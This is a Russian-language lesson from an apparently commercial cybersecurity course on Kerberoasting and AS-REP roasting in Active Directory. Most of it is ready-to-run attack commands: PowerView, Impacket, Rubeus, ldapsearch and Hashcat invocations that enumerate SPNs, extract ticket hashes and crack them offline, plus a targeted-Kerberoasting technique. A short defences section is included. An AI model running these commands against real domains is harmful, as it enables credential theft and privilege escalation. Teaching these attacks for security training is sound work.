Kerberoasting и AS-REP Roasting
Запрашивайте сервисные билеты Kerberos и взламывайте их автономно с помощью Hashcat.
«Kerberoasting и AS-REP Roasting» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Шифрование билетов Kerberos
Сервисные билеты зашифрованы хешем пароля учетной записи службы. Любой пользователь домена может запросить сервисный билет для любого SPN. Если у учетной записи службы слабый пароль, билет можно взломать автономно.
Что такое керберостинг
Керберостинг запрашивает сервисные билеты для учетных записей с именами участников-служб (SPN), извлекает зашифрованный билет и взламывает его автономно с помощью Hashcat. Повышенные привилегии не требуются — это может сделать любой пользователь домена.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatПоиск SPN
Перечислите все учетные записи служб с SPN с помощью PowerView, Impacket или встроенных инструментов AD. SPN связывают учетные записи служб с их службами.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalNameЗапрос и извлечение билетов
Rubeus (Windows) и GetUserSPNs из Impacket (Linux) запрашивают билеты и выводят их в формате, пригодном для взлома.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtВзлом с помощью Hashcat
Хеши керберостинга используют режим 13100 (TGS-REP Kerberos 5). Для максимальной эффективности используйте надежный словарь со специальными правилами.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)Что такое перебор AS-REP
Атака с перебором AS-REP нацелена на учетные записи, для которых включен параметр Не требовать предварительную аутентификацию Kerberos. AS возвращает TGT, зашифрованный хешем пользователя, — его можно запросить без знания пароля и взломать автономно.
Поиск учетных записей с отключенной предварительной аутентификацией
Учетные записи без предварительной аутентификации — это ошибка конфигурации, часто оставшаяся от устаревших приложений. Перечислите их с помощью PowerView или GetNPUsers.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtВзлом хешей AS-REP
Хеши AS-REP используют режим Hashcat 18200. Процесс взлома такой же, как при керберостинге, — автономная словарная атака на зашифрованный ответ AS.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.ruleОценка последствий
Взломанные пароли учетных записей служб часто обеспечивают повышенные привилегии: учетные записи служб, запускающих базы данных, программное обеспечение для резервного копирования или Exchange, могут быть администраторами домена. Учетные записи AS-REP часто упускают из виду и плохо защищают.
Целевой керберостинг
Если у вас есть доступ на запись к объекту, вы можете временно добавить SPN к учетной записи высокой ценности, выполнить для нее керберостинг, взломать хеш, а затем удалить SPN, атакуя конкретные учетные записи по мере необходимости.
Меры защиты
Защита от керберостинга: используйте длинные случайные пароли (от 25 символов) для учетных записей служб или, что лучше, групповые управляемые служебные учетные записи (gMSA) с автоматически меняющимися паролями длиной 120 символов. Для защиты от перебора AS-REP включите предварительную аутентификацию для всех учетных записей.
Быстрая проверка
Какой атрибут учетной записи требуется для проведения перебора AS-REP?
Итоги: керберостинг и перебор AS-REP
Обе атаки используют слабые места шифрования билетов Kerberos, позволяя взламывать пароли автономно и не вызывая блокировку учетных записей. Керберостинг нацелен на учетные записи с SPN (его может выполнить любой пользователь домена), а перебор AS-REP — на учетные записи без предварительной аутентификации (учетные данные не нужны). Для учетных записей служб используйте gMSA, а для всех пользователей включите предварительную аутентификацию.
Часто задаваемые вопросы
Урок «Kerberoasting и AS-REP Roasting» бесплатный?
Да — полный текст урока «Kerberoasting и AS-REP Roasting» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Kerberoasting и AS-REP Roasting»?
Запрашивайте сервисные билеты Kerberos и взламывайте их автономно с помощью Hashcat. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.
Сколько времени занимает урок «Kerberoasting и AS-REP Roasting»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Аутентификация Windows: NTLM и Kerberos
- Атаки Pass-the-Hash и Pass-the-Ticket
- Kerberoasting и AS-REP Roasting
- Защита Active Directory